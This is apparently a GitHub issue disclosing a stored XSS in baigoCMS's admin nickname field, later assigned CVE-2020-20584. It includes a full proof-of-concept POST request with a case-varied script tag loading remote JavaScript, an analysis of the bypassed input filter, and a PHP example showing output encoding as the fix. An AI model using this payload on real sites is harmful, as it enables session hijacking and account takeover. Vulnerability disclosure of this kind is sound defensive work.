
There is a stored XSS vulnerability #13

Q1ngShan opened this issue Oct 10, 2019 · 3 comments
Comments

@Q1ngShan

Vulnerability description

An XSS vulnerability was discovered in baigoCMS.
There is a persistent XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the form (admin_nick) parameter posted to
/public/console/profile/info-submit/

POC:

XSS payload: <sCRiPt/SrC=//your js>

POST /public/console/profile/info-submit/?1570709270213at0.7949324520660688 HTTP/1.1
Host: ad.com
Proxy-Connection: keep-alive
Content-Length: 116
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://ad.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://ad.com/public/console/profile/info/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: baigo_sso_admin_id=1; baigo_sso_admin_hash=62bcd73f59081180cdda5bdf87d86b40; baigo_sso_admin_login_type=form; baigo_sso_admin_cookie_time=1570709261; PHPSESSID=268dc2000398555211fc455bbc0ded26; BX=8k8fbjteptoil&b=3&s=5v; baigoSSOssinID=0de8f68574d90c91896a1ee2a2f1dcaa

__token__=417102b0cdb072c660d1dca097b83ac1&admin_pass=123123&admin_nick=%3CsCRiPt%2FSrC%3D%2F%2F%C3%A7.top%2FImLm%3E

Submit this form. After refreshing, you can find that our XSS statement was successfully executed.

Vulnerability Analysis

Filename: app/ctrl/console/profile.ctrl.php, function: infoSubmit, line 70. It filters the content on the input.
Continue to follow up on this process.
Because the incoming argument is an array, it will go into the fillParam method at line 352.
At line 826, it enters the safe function to filter the input content.
It filters the input content for XSS and SQL injection, but we can bypass this.
Payload:

<sCRiPt/SrC=//js>
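An added illustration of the defensive point behind this report; it is not baigoCMS code and does not reproduce the project's safe function. The report shows a payload that survives an input-side filter because it avoids the lowercase `<script ` form the filter expects. The example below contrasts a constructed blacklist filter (`naiveInputFilter`, a stand-in, not the project's) with contextual output encoding at render time (`encodeForHtml`, `renderNick`, both hypothetical names), and includes a reviewer check (`containsRawTag`) for stored values that still carry an unencoded tag.

```php
<?php
// Added example, not baigoCMS code. Contrasts an input-side blacklist filter
// (constructed stand-in for the kind of filter the report describes) with
// contextual output encoding, using the payload from the report as input.

declare(strict_types=1);

/**
 * Constructed blacklist-style input filter. It strips the token "<script"
 * followed by whitespace or ">", so it never recognises "<sCRiPt/SrC=...>":
 * the match is case-sensitive and the "/" separator is not in its character
 * class. This is the failure mode of filtering on input.
 */
function naiveInputFilter(string $value): string
{
    return preg_replace('/<script[\s>]/', '', $value) ?? $value;
}

/**
 * Contextual output encoding for an HTML text node or quoted attribute value.
 * Every character the HTML parser treats as markup becomes an entity, so the
 * browser renders the nickname as text whatever its case or separators.
 */
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/**
 * Hypothetical template fragment for the profile page: the stored nickname is
 * encoded at the point where it is written into HTML, independent of any
 * filtering that happened on input.
 */
function renderNick(string $storedNick): string
{
    return '<span class="admin-nick">' . encodeForHtml($storedNick) . '</span>';
}

/**
 * Reviewer check for values already in the database: a surviving "<" followed
 * by a tag name means the value is unsafe to emit into an unencoded template.
 */
function containsRawTag(string $value): bool
{
    return preg_match('/<\s*\/?[a-z][^>]*>/i', $value) === 1;
}

// Payload from the report, used here as a constructed test input.
$payload = '<sCRiPt/SrC=//js>';

$afterFilter = naiveInputFilter($payload);
$afterEncode = encodeForHtml($payload);

printf("blacklist filter, raw tag survives: %s\n", containsRawTag($afterFilter) ? 'yes' : 'no');
printf("output encoding, raw tag survives:  %s\n", containsRawTag($afterEncode) ? 'yes' : 'no');
printf("rendered fragment: %s\n", renderNick($payload));
```

Run with `php example.php`. The first line reports that the constructed filter leaves the tag intact, the second that encoding removes every raw `<` and `>`, and the rendered fragment shows the nickname as inert text inside the span. The design point is that the encoding step lives in the template, next to the HTML context it protects, so it does not depend on enumerating payload variants on input.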
@fonering
Contributor

Thank you!

@fgeek

fgeek commented Jul 9, 2021

CVE-2020-20584 was assigned for this vulnerability.

@fgeek

fgeek commented Jul 9, 2021

@Q1ngShan shouldn't this be reported under https://github.com/baigoStudio/baigoCMS instead of baigoSSO?
